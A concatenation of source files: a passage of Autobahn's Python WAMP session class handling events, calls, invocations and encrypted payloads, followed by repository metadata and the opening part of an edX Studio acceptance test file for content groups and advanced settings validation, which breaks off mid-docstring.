self.log.warn("envelope topic URI does not match encrypted one")
invoke_args = (handler.obj,) if handler.obj else tuple()
if msg.args:
invoke_args = invoke_args + tuple(msg.args)
invoke_kwargs = msg.kwargs if msg.kwargs else dict()
if handler.details_arg:
invoke_kwargs[handler.details_arg] = types.EventDetails(publication=msg.publication, publisher=msg.publisher, publisher_authid=msg.publisher_authid, publisher_authrole=msg.publisher_authrole, topic=topic, enc_algo=msg.enc_algo)
def _error(e):
errmsg = 'While firing {0} subscribed under {1}.'.format(
handler.fn, msg.subscription)
return self._swallow_error(e, errmsg)
future = txaio.as_future(handler.fn, *invoke_args, **invoke_kwargs)
txaio.add_callbacks(future, None, _error)
else:
raise ProtocolError("EVENT received for non-subscribed subscription ID {0}".format(msg.subscription))
elif isinstance(msg, message.Published):
if msg.request in self._publish_reqs:
# get and pop outstanding publish request
publish_request = self._publish_reqs.pop(msg.request)
# create a new publication object
publication = Publication(msg.publication, was_encrypted=publish_request.was_encrypted)
# resolve deferred/future for publishing successfully
txaio.resolve(publish_request.on_reply, publication)
else:
raise ProtocolError("PUBLISHED received for non-pending request ID {0}".format(msg.request))
elif isinstance(msg, message.Subscribed):
if msg.request in self._subscribe_reqs:
# get and pop outstanding subscribe request
request = self._subscribe_reqs.pop(msg.request)
# create new handler subscription list for subscription ID if not yet tracked
if msg.subscription not in self._subscriptions:
self._subscriptions[msg.subscription] = []
subscription = Subscription(msg.subscription, request.topic, self, request.handler)
# add handler to existing subscription
self._subscriptions[msg.subscription].append(subscription)
# resolve deferred/future for subscribing successfully
txaio.resolve(request.on_reply, subscription)
else:
raise ProtocolError("SUBSCRIBED received for non-pending request ID {0}".format(msg.request))
elif isinstance(msg, message.Unsubscribed):
if msg.request in self._unsubscribe_reqs:
# get and pop outstanding subscribe request
request = self._unsubscribe_reqs.pop(msg.request)
# if the subscription still exists, mark as inactive and remove ..
if request.subscription_id in self._subscriptions:
for subscription in self._subscriptions[request.subscription_id]:
subscription.active = False
del self._subscriptions[request.subscription_id]
# resolve deferred/future for unsubscribing successfully
txaio.resolve(request.on_reply, 0)
else:
raise ProtocolError("UNSUBSCRIBED received for non-pending request ID {0}".format(msg.request))
elif isinstance(msg, message.Result):
if msg.request in self._call_reqs:
call_request = self._call_reqs[msg.request]
proc = call_request.procedure
enc_err = None
if msg.enc_algo == message.PAYLOAD_ENC_CRYPTO_BOX:
if not self._keyring:
log_msg = u"received encrypted payload, but no keyring active"
self.log.warn(log_msg)
enc_err = ApplicationError(ApplicationError.ENC_NO_KEYRING_ACTIVE, log_msg)
else:
try:
encrypted_payload = EncryptedPayload(msg.enc_algo, msg.enc_key, msg.enc_serializer, msg.payload)
decrypted_proc, msg.args, msg.kwargs = self._keyring.decrypt(True, proc, encrypted_payload)
except Exception as e:
self.log.warn(
"failed to decrypt application payload 1: {err}",
err=e,
)
enc_err = ApplicationError(
ApplicationError.ENC_DECRYPT_ERROR,
u"failed to decrypt application payload 1: {}".format(e),
)
else:
if proc != decrypted_proc:
self.log.warn(
"URI within encrypted payload ('{decrypted_proc}') does not match the envelope ('{proc}')",
decrypted_proc=decrypted_proc,
proc=proc,
)
enc_err = ApplicationError(
ApplicationError.ENC_TRUSTED_URI_MISMATCH,
u"URI within encrypted payload ('{}') does not match the envelope ('{}')".format(decrypted_proc, proc),
)
if msg.progress:
# process progressive call result
if call_request.options.on_progress:
if enc_err:
self.onUserError(enc_err, "could not deliver progressive call result, because payload decryption failed")
else:
kw = msg.kwargs or dict()
args = msg.args or tuple()
try:
# XXX what if on_progress returns a Deferred/Future?
call_request.options.on_progress(*args, **kw)
except Exception:
try:
self.onUserError(txaio.create_failure(), "While firing on_progress")
except:
pass
else:
# process final call result
# drop original request
del self._call_reqs[msg.request]
# user callback that gets fired
on_reply = call_request.on_reply
# above might already have rejected, so we guard ..
if enc_err:
txaio.reject(on_reply, enc_err)
else:
if msg.kwargs:
if msg.args:
res = types.CallResult(*msg.args, **msg.kwargs)
else:
res = types.CallResult(**msg.kwargs)
txaio.resolve(on_reply, res)
else:
if msg.args:
if len(msg.args) > 1:
res = types.CallResult(*msg.args)
txaio.resolve(on_reply, res)
else:
txaio.resolve(on_reply, msg.args[0])
else:
txaio.resolve(on_reply, None)
else:
raise ProtocolError("RESULT received for non-pending request ID {0}".format(msg.request))
elif isinstance(msg, message.Invocation):
if msg.request in self._invocations:
raise ProtocolError("INVOCATION received for request ID {0} already invoked".format(msg.request))
else:
if msg.registration not in self._registrations:
raise ProtocolError("INVOCATION received for non-registered registration ID {0}".format(msg.registration))
else:
registration = self._registrations[msg.registration]
endpoint = registration.endpoint
proc = msg.procedure or registration.procedure
enc_err = None
if msg.enc_algo == message.PAYLOAD_ENC_CRYPTO_BOX:
if not self._keyring:
log_msg = u"received encrypted INVOCATION payload, but no keyring active"
self.log.warn(log_msg)
enc_err = ApplicationError(ApplicationError.ENC_NO_KEYRING_ACTIVE, log_msg)
else:
try:
encrypted_payload = EncryptedPayload(msg.enc_algo, msg.enc_key, msg.enc_serializer, msg.payload)
decrypted_proc, msg.args, msg.kwargs = self._keyring.decrypt(False, proc, encrypted_payload)
except Exception as e:
self.log.warn(
"failed to decrypt INVOCATION payload: {err}",
err=e,
)
enc_err = ApplicationError(
ApplicationError.ENC_DECRYPT_ERROR,
"failed to decrypt INVOCATION payload: {}".format(e),
)
else:
if proc != decrypted_proc:
self.log.warn(
"URI within encrypted INVOCATION payload ('{decrypted_proc}') "
"does not match the envelope ('{proc}')",
decrypted_proc=decrypted_proc,
proc=proc,
)
enc_err = ApplicationError(
ApplicationError.ENC_TRUSTED_URI_MISMATCH,
u"URI within encrypted INVOCATION payload ('{}') does not match the envelope ('{}')".format(decrypted_proc, proc),
)
if enc_err:
# when there was a problem decrypting the INVOCATION payload, we obviously can't invoke
# the endpoint, but return and
reply = self._message_from_exception(message.Invocation.MESSAGE_TYPE, msg.request, enc_err)
self._transport.send(reply)
else:
if endpoint.obj is not None:
invoke_args = (endpoint.obj,)
else:
invoke_args = tuple()
if msg.args:
invoke_args = invoke_args + tuple(msg.args)
invoke_kwargs = msg.kwargs if msg.kwargs else dict()
if endpoint.details_arg:
if msg.receive_progress:
def progress(*args, **kwargs):
encrypted_payload = None
if msg.enc_algo == message.PAYLOAD_ENC_CRYPTO_BOX:
if not self._keyring:
raise Exception(u"trying to send encrypted payload, but no keyring active")
encrypted_payload = self._keyring.encrypt(False, proc, args, kwargs)
if encrypted_payload:
progress_msg = message.Yield(msg.request,
payload=encrypted_payload.payload,
progress=True,
enc_algo=encrypted_payload.algo,
enc_key=encrypted_payload.pkey,
enc_serializer=encrypted_payload.serializer)
else:
progress_msg = message.Yield(msg.request,
args=args,
kwargs=kwargs,
progress=True)
self._transport.send(progress_msg)
else:
progress = None
invoke_kwargs[endpoint.details_arg] = types.CallDetails(progress, caller=msg.caller, caller_authid=msg.caller_authid, caller_authrole=msg.caller_authrole, procedure=proc, enc_algo=msg.enc_algo)
on_reply = txaio.as_future(endpoint.fn, *invoke_args, **invoke_kwargs)
def success(res):
del self._invocations[msg.request]
encrypted_payload = None
if msg.enc_algo == message.PAYLOAD_ENC_CRYPTO_BOX:
if not self._keyring:
log_msg = u"trying to send encrypted payload, but no keyring active"
self.log.warn(log_msg)
else:
try:
if isinstance(res, types.CallResult):
encrypted_payload = self._keyring.encrypt(False, proc, res.results, res.kwresults)
else:
encrypted_payload = self._keyring.encrypt(False, proc, [res])
except Exception as e:
self.log.warn(
"failed to encrypt application payload: {err}",
err=e,
)
if encrypted_payload:
reply = message.Yield(msg.request,
payload=encrypted_payload.payload,
enc_algo=encrypted_payload.algo,
enc_key=encrypted_payload.pkey,
enc_serializer=encrypted_payload.serializer)
else:
if isinstance(res, types.CallResult):
reply = message.Yield(msg.request,
args=res.results,
kwargs=res.kwresults)
else:
reply = message.Yield(msg.request,
args=[res])
try:
self._transport.send(reply)
except SerializationError as e:
# the application-level payload returned from the invoked procedure can't be serialized
reply = message.Error(message.Invocation.MESSAGE_TYPE, msg.request, ApplicationError.INVALID_PAYLOAD,
args=[u'success return value from invoked procedure "{0}" could not be serialized: {1}'.format(registration.procedure, e)])
self._transport.send(reply)
def error(err):
del self._invocations[msg.request]
errmsg = txaio.failure_message(err)
try:
self.onUserError(err, errmsg)
except:
pass
formatted_tb = None
if self.traceback_app:
formatted_tb = txaio.failure_format_traceback(err)
reply = self._message_from_exception(
message.Invocation.MESSAGE_TYPE,
msg.request,
err.value,
formatted_tb,
msg.enc_algo
)
try:
self._transport.send(reply)
except SerializationError as e:
# the application-level payload returned from the invoked procedure can't be serialized
reply = message.Error(message.Invocation.MESSAGE_TYPE, msg.request, ApplicationError.INVALID_PAYLOAD,
args=[u'error return value from invoked procedure "{0}" could not be serialized: {1}'.format(registration.procedure, e)])
self._transport.send(reply)
# we have handled the error, so we eat it
return None
self._invocations[msg.request] = InvocationRequest(msg.request, on_reply)
txaio.add_callbacks(on_reply, success, error)
elif isinstance(msg, message.Interrupt):
if msg.request not in self._invocations:
raise ProtocolError("INTERRUPT received for non-pending invocation {0}".format(msg.request))
else:
# noinspection PyBroadException
try:
self._invocations[msg.request].cancel()
except Exception:
# XXX can .cancel() return a Deferred/Future?
try:
self.onUserError(
txaio.create_failure(),
"While cancelling call.",
)
except:
pass
finally:
del self._invocations[msg.request]
elif isinstance(msg, message.Registered):
if msg.request in self._register_reqs:
# get and pop outstanding register request
request = self._register_reqs.pop(msg.request)
# create new registration if not yet tracked
if msg.registration not in self._registrations:
registration = Registration(self, msg.registration, request.procedure, request.endpoint)
self._registrations[msg.registration] = registration
else:
raise ProtocolError("REGISTERED received for already existing registration ID {0}".format(msg.registration))
txaio.resolve(request.on_reply, registration)
else:
raise ProtocolError("REGISTERED received for non-pending request ID {0}".format(msg.request))
elif isinstance(msg, message.Unregistered):
if msg.request in self._unregister_reqs:
# get and pop outstanding subscribe request
request = self._unregister_reqs.pop(msg.request)
# if the registration still exists, mark as inactive and remove ..
if request.registration_id in self._registrations:
self._registrations[request.registration_id].active = False
del self._registrations[request.registration_id]
# resolve deferred/future for unregistering successfully
txaio.resolve(request.on_reply)
else:
raise ProtocolError("UNREGISTERED received for non-pending request ID {0}".format(msg.request))
elif isinstance(msg, message.Error):
# remove outstanding request and get the reply deferred/future
on_reply = None
# ERROR reply to CALL
if msg.request_type == message.Call.MESSAGE_TYPE and msg.request in self._call_reqs:
on_reply = self._call_reqs.pop(msg.request).on_reply
# ERROR reply to PUBLISH
elif msg.request_type == message.Publish.MESSAGE_TYPE and msg.request in self._publish_reqs:
on_reply = self._publish_reqs.pop(msg.request).on_reply
# ERROR reply to SUBSCRIBE
elif msg.request_type == message.Subscribe.MESSAGE_TYPE and msg.request in self._subscribe_reqs:
on_reply = self._subscribe_reqs.pop(msg.request).on_reply
# ERROR reply to UNSUBSCRIBE
elif msg.request_type == message.Unsubscribe.MESSAGE_TYPE and msg.request in self._unsubscribe_reqs:
on_reply = self._unsubscribe_reqs.pop(msg.request).on_reply
# ERROR reply to REGISTER
elif msg.request_type == message.Register.MESSAGE_TYPE and msg.request in self._register_reqs:
on_reply = self._register_reqs.pop(msg.request).on_reply
# ERROR reply to UNREGISTER
elif msg.request_type == message.Unregister.MESSAGE_TYPE and msg.request in self._unregister_reqs:
on_reply = self._unregister_reqs.pop(msg.request).on_reply
if on_reply:
txaio.reject(on_reply, self._exception_from_message(msg))
else:
raise ProtocolError("WampAppSession.onMessage(): ERROR received for non-pending request_type {0} and request ID {1}".format(msg.request_type, msg.request))
else:
raise ProtocolError("Unexpected message {0}".format(msg.__class__))
# noinspection PyUnusedLocal
def onClose(self, wasClean):
"""
Implements :func:`autobahn.wamp.interfaces.ITransportHandler.onClose`
"""
self._transport = None
if self._session_id:
# fire callback and close the transport
details = types.CloseDetails(
reason=types.CloseDetails.REASON_TRANSPORT_LOST,
message=(u"WAMP transport was lost without closing the"
u" session before"),
)
d = txaio.as_future(self.onLeave, details)
def success(arg):
# XXX also: handle async
self.fire('leave', self, details)
return arg
def _error(e):
return self._swallow_error(e, "While firing onLeave")
txaio.add_callbacks(d, success, _error)
self._session_id = None
d = txaio.as_future(self.onDisconnect)
def success(arg):
# XXX do we care about returning 'arg' properly?
return self.fire('disconnect', self, was_clean=wasClean)
def _error(e):
return self._swallow_error(e, "While firing onDisconnect")
txaio.add_callbacks(d, None, _error)
def onChallenge(self, challenge):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.onChallenge`
"""
raise Exception("received authentication challenge, but onChallenge not implemented")
def onJoin(self, details):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.onJoin`
"""
def onLeave(self, details):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.onLeave`
"""
if details.reason.startswith('wamp.error.'):
self.log.error('{reason}: {wamp_message}', reason=details.reason, wamp_message=details.message)
if self._transport:
self.disconnect()
# do we ever call onLeave with a valid transport?
def leave(self, reason=None, log_message=None):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.leave`
"""
if not self._session_id:
raise SessionNotReady(u"session hasn't joined a realm")
if not self._goodbye_sent:
if not reason:
reason = u"wamp.close.normal"
msg = wamp.message.Goodbye(reason=reason, message=log_message)
self._transport.send(msg)
self._goodbye_sent = True
# deferred that fires when transport actually hits CLOSED
is_closed = self._transport is None or self._transport.is_closed
return is_closed
else:
raise SessionNotReady(u"session was alread requested to leave")
def onDisconnect(self):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.onDisconnect`
"""
pass # return self.fire('disconnect', self, True)
def publish(self, topic, *args, **kwargs):
"""
Implements :func:`autobahn.wamp.interfaces.IPublisher.publish`
"""
if six.PY2 and type(topic) == str:
topic = six.u(topic)
assert(type(topic) == six.text_type)
if not self._transport:
raise exception.TransportLost()
options = kwargs.pop('options', None)
if options and not isinstance(options, types.PublishOptions):
raise Exception("options must be of type a.w.t.PublishOptions")
request_id = self._request_id_gen.next()
encrypted_payload = None
if self._keyring:
encrypted_payload = self._keyring.encrypt(True, topic, args, kwargs)
if encrypted_payload:
if options:
msg = message.Publish(request_id,
topic,
payload=encrypted_payload.payload,
enc_algo=encrypted_payload.algo,
enc_key=encrypted_payload.pkey,
enc_serializer=encrypted_payload.serializer,
**options.message_attr())
else:
msg = message.Publish(request_id,
topic,
payload=encrypted_payload.payload,
enc_algo=encrypted_payload.algo,
enc_key=encrypted_payload.pkey,
enc_serializer=encrypted_payload.serializer)
else:
if options:
msg = message.Publish(request_id,
topic,
args=args,
kwargs=kwargs,
**options.message_attr())
else:
msg = message.Publish(request_id,
topic,
args=args,
kwargs=kwargs)
if options and options.acknowledge:
# only acknowledged publications expect a reply ..
on_reply = txaio.create_future()
self._publish_reqs[request_id] = PublishRequest(request_id, on_reply, was_encrypted=(encrypted_payload is not None))
else:
on_reply = None
try:
# Notes:
#
# * this might raise autobahn.wamp.exception.SerializationError
# when the user payload cannot be serialized
# * we have to setup a PublishRequest() in _publish_reqs _before_
# calling transpor.send(), because a mock- or side-by-side transport
# will immediately lead on an incoming WAMP message in onMessage()
#
self._transport.send(msg)
except Exception as e:
if request_id in self._publish_reqs:
del self._publish_reqs[request_id]
raise e
return on_reply
def subscribe(self, handler, topic=None, options=None):
"""
Implements :func:`autobahn.wamp.interfaces.ISubscriber.subscribe`
"""
assert((callable(handler) and topic is not None) or hasattr(handler, '__class__'))
if topic and six.PY2 and type(topic) == str:
topic = six.u(topic)
assert(topic is None or type(topic) == six.text_type)
assert(options is None or isinstance(options, types.SubscribeOptions))
if not self._transport:
raise exception.TransportLost()
def _subscribe(obj, fn, topic, options):
request_id = self._request_id_gen.next()
on_reply = txaio.create_future()
handler_obj = Handler(fn, obj, options.details_arg if options else None)
self._subscribe_reqs[request_id] = SubscribeRequest(request_id, topic, on_reply, handler_obj)
if options:
msg = message.Subscribe(request_id, topic, **options.message_attr())
else:
msg = message.Subscribe(request_id, topic)
self._transport.send(msg)
return on_reply
if callable(handler):
# subscribe a single handler
return _subscribe(None, handler, topic, options)
else:
# subscribe all methods on an object decorated with "wamp.subscribe"
on_replies = []
for k in inspect.getmembers(handler.__class__, is_method_or_function):
proc = k[1]
if "_wampuris" in proc.__dict__:
for pat in proc.__dict__["_wampuris"]:
if pat.is_handler():
uri = pat.uri()
subopts = options or pat.subscribe_options()
on_replies.append(_subscribe(handler, proc, uri, subopts))
# XXX needs coverage
return txaio.gather(on_replies, consume_exceptions=True)
def _unsubscribe(self, subscription):
"""
Called from :meth:`autobahn.wamp.protocol.Subscription.unsubscribe`
"""
assert(isinstance(subscription, Subscription))
assert subscription.active
assert(subscription.id in self._subscriptions)
assert(subscription in self._subscriptions[subscription.id])
if not self._transport:
raise exception.TransportLost()
# remove handler subscription and mark as inactive
self._subscriptions[subscription.id].remove(subscription)
subscription.active = False
# number of handler subscriptions left ..
scount = len(self._subscriptions[subscription.id])
if scount == 0:
# if the last handler was removed, unsubscribe from broker ..
request_id = self._request_id_gen.next()
on_reply = txaio.create_future()
self._unsubscribe_reqs[request_id] = UnsubscribeRequest(request_id, on_reply, subscription.id)
msg = message.Unsubscribe(request_id, subscription.id)
self._transport.send(msg)
return on_reply
else:
# there are still handlers active on the subscription!
return txaio.create_future_success(scount)
def call(self, procedure, *args, **kwargs):
"""
Implements :func:`autobahn.wamp.interfaces.ICaller.call`
"""
if six.PY2 and type(procedure) == str:
procedure = six.u(procedure)
assert(isinstance(procedure, six.text_type))
if not self._transport:
raise exception.TransportLost()
options = kwargs.pop('options', None)
if options and not isinstance(options, types.CallOptions):
raise Exception("options must be of type a.w.t.CallOptions")
request_id = self._request_id_gen.next()
encrypted_payload = None
if self._keyring:
encrypted_payload = self._keyring.encrypt(True, procedure, args, kwargs)
if encrypted_payload:
if options:
msg = message.Call(request_id,
procedure,
payload=encrypted_payload.payload,
enc_algo=encrypted_payload.algo,
enc_key=encrypted_payload.pkey,
enc_serializer=encrypted_payload.serializer,
**options.message_attr())
else:
msg = message.Call(request_id,
procedure,
payload=encrypted_payload.payload,
enc_algo=encrypted_payload.algo,
enc_key=encrypted_payload.pkey,
enc_serializer=encrypted_payload.serializer)
else:
if options:
msg = message.Call(request_id,
procedure,
args=args,
kwargs=kwargs,
**options.message_attr())
else:
msg = message.Call(request_id,
procedure,
args=args,
kwargs=kwargs)
# FIXME: implement call canceling
# def canceller(_d):
# cancel_msg = message.Cancel(request)
# self._transport.send(cancel_msg)
# d = Deferred(canceller)
on_reply = txaio.create_future()
self._call_reqs[request_id] = CallRequest(request_id, procedure, on_reply, options)
try:
# Notes:
#
# * this might raise autobahn.wamp.exception.SerializationError
# when the user payload cannot be serialized
# * we have to setup a CallRequest() in _call_reqs _before_
# calling transpor.send(), because a mock- or side-by-side transport
# will immediately lead on an incoming WAMP message in onMessage()
#
self._transport.send(msg)
except:
if request_id in self._call_reqs:
del self._call_reqs[request_id]
raise
return on_reply
def register(self, endpoint, procedure=None, options=None):
"""
Implements :func:`autobahn.wamp.interfaces.ICallee.register`
"""
assert((callable(endpoint) and procedure is not None) or hasattr(endpoint, '__class__'))
if procedure and six.PY2 and type(procedure) == str:
procedure = six.u(procedure)
assert(procedure is None or type(procedure) == six.text_type)
assert(options is None or isinstance(options, types.RegisterOptions))
if not self._transport:
raise exception.TransportLost()
def _register(obj, fn, procedure, options):
request_id = self._request_id_gen.next()
on_reply = txaio.create_future()
endpoint_obj = Endpoint(fn, obj, options.details_arg if options else None)
self._register_reqs[request_id] = RegisterRequest(request_id, on_reply, procedure, endpoint_obj)
if options:
msg = message.Register(request_id, procedure, **options.message_attr())
else:
msg = message.Register(request_id, procedure)
self._transport.send(msg)
return on_reply
if callable(endpoint):
# register a single callable
return _register(None, endpoint, procedure, options)
else:
# register all methods on an object decorated with "wamp.register"
on_replies = []
for k in inspect.getmembers(endpoint.__class__, is_method_or_function):
proc = k[1]
if "_wampuris" in proc.__dict__:
for pat in proc.__dict__["_wampuris"]:
if pat.is_endpoint():
uri = pat.uri()
on_replies.append(_register(endpoint, proc, uri, options))
# XXX neds coverage
return txaio.gather(on_replies, consume_exceptions=True)
def _unregister(self, registration):
"""
Called from :meth:`autobahn.wamp.protocol.Registration.unregister`
"""
assert(isinstance(registration, Registration))
assert registration.active
assert(registration.id in self._registrations)
if not self._transport:
raise exception.TransportLost()
request_id = self._request_id_gen.next()
on_reply = txaio.create_future()
self._unregister_reqs[request_id] = UnregisterRequest(request_id, on_reply, registration.id)
msg = message.Unregister(request_id, registration.id)
self._transport.send(msg)
return on_reply
# IApplicationSession.register collides with the abc.ABCMeta.register method
# IApplicationSession.register(ApplicationSession)
class ApplicationSessionFactory(object):
"""
WAMP endpoint session factory.
"""
session = ApplicationSession
"""
WAMP application session class to be used in this factory.
"""
def __init__(self, config=None):
"""
:param config: The default component configuration.
:type config: instance of :class:`autobahn.wamp.types.ComponentConfig`
"""
self.config = config or types.ComponentConfig(realm=u"default")
def __call__(self):
"""
Creates a new WAMP application session.
:returns: -- An instance of the WAMP application session class as
given by `self.session`.
"""
session = self.session(self.config)
session.factory = self
return session
|
mit
|
franosincic/edx-platform
|
common/test/acceptance/tests/studio/test_studio_settings.py
|
13
|
19722
|
# coding: utf-8
"""
Acceptance tests for Studio's Setting pages
"""
from __future__ import unicode_literals
from nose.plugins.attrib import attr
from base_studio_test import StudioCourseTest
from bok_choy.promise import EmptyPromise
from ...fixtures.course import XBlockFixtureDesc
from ..helpers import create_user_partition_json
from ...pages.studio.overview import CourseOutlinePage
from ...pages.studio.settings import SettingsPage
from ...pages.studio.settings_advanced import AdvancedSettingsPage
from ...pages.studio.settings_group_configurations import GroupConfigurationsPage
from ...pages.lms.courseware import CoursewarePage
from textwrap import dedent
from xmodule.partitions.partitions import Group
@attr('shard_8')
class ContentGroupConfigurationTest(StudioCourseTest):
"""
Tests for content groups in the Group Configurations Page.
There are tests for the experiment groups in test_studio_split_test.
"""
def setUp(self):
super(ContentGroupConfigurationTest, self).setUp()
self.group_configurations_page = GroupConfigurationsPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.outline_page = CourseOutlinePage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
def populate_course_fixture(self, course_fixture):
"""
Populates test course with chapter, sequential, and 1 problems.
The problem is visible only to Group "alpha".
"""
course_fixture.add_children(
XBlockFixtureDesc('chapter', 'Test Section').add_children(
XBlockFixtureDesc('sequential', 'Test Subsection').add_children(
XBlockFixtureDesc('vertical', 'Test Unit')
)
)
)
def create_and_verify_content_group(self, name, existing_groups):
"""
Creates a new content group and verifies that it was properly created.
"""
self.assertEqual(existing_groups, len(self.group_configurations_page.content_groups))
if existing_groups == 0:
self.group_configurations_page.create_first_content_group()
else:
self.group_configurations_page.add_content_group()
config = self.group_configurations_page.content_groups[existing_groups]
config.name = name
# Save the content group
self.assertEqual(config.get_text('.action-primary'), "Create")
self.assertFalse(config.delete_button_is_present)
config.save()
self.assertIn(name, config.name)
return config
def test_no_content_groups_by_default(self):
"""
Scenario: Ensure that message telling me to create a new content group is
shown when no content groups exist.
Given I have a course without content groups
When I go to the Group Configuration page in Studio
Then I see "You have not created any content groups yet." message
"""
self.group_configurations_page.visit()
self.assertTrue(self.group_configurations_page.no_content_groups_message_is_present)
self.assertIn(
"You have not created any content groups yet.",
self.group_configurations_page.no_content_groups_message_text
)
def test_can_create_and_edit_content_groups(self):
"""
Scenario: Ensure that the content groups can be created and edited correctly.
Given I have a course without content groups
When I click button 'Add your first Content Group'
And I set new the name and click the button 'Create'
Then I see the new content is added and has correct data
And I click 'New Content Group' button
And I set the name and click the button 'Create'
Then I see the second content group is added and has correct data
When I edit the second content group
And I change the name and click the button 'Save'
Then I see the second content group is saved successfully and has the new name
"""
self.group_configurations_page.visit()
self.create_and_verify_content_group("New Content Group", 0)
second_config = self.create_and_verify_content_group("Second Content Group", 1)
# Edit the second content group
second_config.edit()
second_config.name = "Updated Second Content Group"
self.assertEqual(second_config.get_text('.action-primary'), "Save")
second_config.save()
self.assertIn("Updated Second Content Group", second_config.name)
def test_cannot_delete_used_content_group(self):
"""
Scenario: Ensure that the user cannot delete used content group.
Given I have a course with 1 Content Group
And I go to the Group Configuration page
When I try to delete the Content Group with name "New Content Group"
Then I see the delete button is disabled.
"""
self.course_fixture._update_xblock(self.course_fixture._course_location, {
"metadata": {
u"user_partitions": [
create_user_partition_json(
0,
'Configuration alpha,',
'Content Group Partition',
[Group("0", 'alpha')],
scheme="cohort"
)
],
},
})
problem_data = dedent("""
<problem markdown="Simple Problem" max_attempts="" weight="">
<p>Choose Yes.</p>
<choiceresponse>
<checkboxgroup>
<choice correct="true">Yes</choice>
</checkboxgroup>
</choiceresponse>
</problem>
""")
vertical = self.course_fixture.get_nested_xblocks(category="vertical")[0]
self.course_fixture.create_xblock(
vertical.locator,
XBlockFixtureDesc('problem', "VISIBLE TO ALPHA", data=problem_data, metadata={"group_access": {0: [0]}}),
)
self.group_configurations_page.visit()
config = self.group_configurations_page.content_groups[0]
self.assertTrue(config.delete_button_is_disabled)
def test_can_delete_unused_content_group(self):
"""
Scenario: Ensure that the user can delete unused content group.
Given I have a course with 1 Content Group
And I go to the Group Configuration page
When I delete the Content Group with name "New Content Group"
Then I see that there is no Content Group
When I refresh the page
Then I see that the content group has been deleted
"""
self.group_configurations_page.visit()
config = self.create_and_verify_content_group("New Content Group", 0)
self.assertTrue(config.delete_button_is_present)
self.assertEqual(len(self.group_configurations_page.content_groups), 1)
# Delete content group
config.delete()
self.assertEqual(len(self.group_configurations_page.content_groups), 0)
self.group_configurations_page.visit()
self.assertEqual(len(self.group_configurations_page.content_groups), 0)
def test_must_supply_name(self):
"""
Scenario: Ensure that validation of the content group works correctly.
Given I have a course without content groups
And I create new content group without specifying a name click the button 'Create'
Then I see error message "Content Group name is required."
When I set a name and click the button 'Create'
Then I see the content group is saved successfully
"""
self.group_configurations_page.visit()
self.group_configurations_page.create_first_content_group()
config = self.group_configurations_page.content_groups[0]
config.save()
self.assertEqual(config.mode, 'edit')
self.assertEqual("Group name is required", config.validation_message)
config.name = "Content Group Name"
config.save()
self.assertIn("Content Group Name", config.name)
def test_can_cancel_creation_of_content_group(self):
"""
Scenario: Ensure that creation of a content group can be canceled correctly.
Given I have a course without content groups
When I click button 'Add your first Content Group'
And I set new the name and click the button 'Cancel'
Then I see that there is no content groups in the course
"""
self.group_configurations_page.visit()
self.group_configurations_page.create_first_content_group()
config = self.group_configurations_page.content_groups[0]
config.name = "Content Group"
config.cancel()
self.assertEqual(0, len(self.group_configurations_page.content_groups))
def test_content_group_empty_usage(self):
"""
Scenario: When content group is not used, ensure that the link to outline page works correctly.
Given I have a course without content group
And I create new content group
Then I see a link to the outline page
When I click on the outline link
Then I see the outline page
"""
self.group_configurations_page.visit()
config = self.create_and_verify_content_group("New Content Group", 0)
config.toggle()
config.click_outline_anchor()
# Waiting for the page load and verify that we've landed on course outline page
EmptyPromise(
lambda: self.outline_page.is_browser_on_page(), "loaded page {!r}".format(self.outline_page),
timeout=30
).fulfill()
@attr('shard_8')
class AdvancedSettingsValidationTest(StudioCourseTest):
"""
Tests for validation feature in Studio's advanced settings tab
"""
def setUp(self):
super(AdvancedSettingsValidationTest, self).setUp()
self.advanced_settings = AdvancedSettingsPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.type_fields = ['Course Display Name', 'Advanced Module List', 'Discussion Topic Mapping',
'Maximum Attempts', 'Course Announcement Date']
# Before every test, make sure to visit the page first
self.advanced_settings.visit()
self.assertTrue(self.advanced_settings.is_browser_on_page())
def test_modal_shows_one_validation_error(self):
"""
Test that advanced settings don't save if there's a single wrong input,
and that it shows the correct error message in the modal.
"""
# Feed an integer value for String field.
# .set method saves automatically after setting a value
course_display_name = self.advanced_settings.get('Course Display Name')
self.advanced_settings.set('Course Display Name', 1)
self.advanced_settings.wait_for_modal_load()
# Test Modal
self.check_modal_shows_correct_contents(['Course Display Name'])
self.advanced_settings.refresh_and_wait_for_load()
self.assertEquals(
self.advanced_settings.get('Course Display Name'),
course_display_name,
'Wrong input for Course Display Name must not change its value'
)
def test_modal_shows_multiple_validation_errors(self):
"""
Test that advanced settings don't save with multiple wrong inputs
"""
# Save original values and feed wrong inputs
original_values_map = self.get_settings_fields_of_each_type()
self.set_wrong_inputs_to_fields()
self.advanced_settings.wait_for_modal_load()
# Test Modal
self.check_modal_shows_correct_contents(self.type_fields)
self.advanced_settings.refresh_and_wait_for_load()
for key, val in original_values_map.iteritems():
self.assertEquals(
self.advanced_settings.get(key),
val,
'Wrong input for Advanced Settings Fields must not change its value'
)
def test_undo_changes(self):
"""
Test that undo changes button in the modal resets all settings changes
"""
# Save original values and feed wrong inputs
original_values_map = self.get_settings_fields_of_each_type()
self.set_wrong_inputs_to_fields()
# Let modal popup
self.advanced_settings.wait_for_modal_load()
# Click Undo Changes button
self.advanced_settings.undo_changes_via_modal()
# Check that changes are undone
for key, val in original_values_map.iteritems():
self.assertEquals(
self.advanced_settings.get(key),
val,
'Undoing Should revert back to original value'
)
def test_manual_change(self):
"""
Test that manual changes button in the modal keeps settings unchanged
"""
inputs = {"Course Display Name": 1,
"Advanced Module List": 1,
"Discussion Topic Mapping": 1,
"Maximum Attempts": '"string"',
"Course Announcement Date": '"string"',
}
self.set_wrong_inputs_to_fields()
self.advanced_settings.wait_for_modal_load()
self.advanced_settings.trigger_manual_changes()
# Check that the validation modal went away.
self.assertFalse(self.advanced_settings.is_validation_modal_present())
# Iterate through the wrong values and make sure they're still displayed
for key, val in inputs.iteritems():
self.assertEquals(
str(self.advanced_settings.get(key)),
str(val),
'manual change should keep: ' + str(val) + ', but is: ' + str(self.advanced_settings.get(key))
)
def check_modal_shows_correct_contents(self, wrong_settings_list):
"""
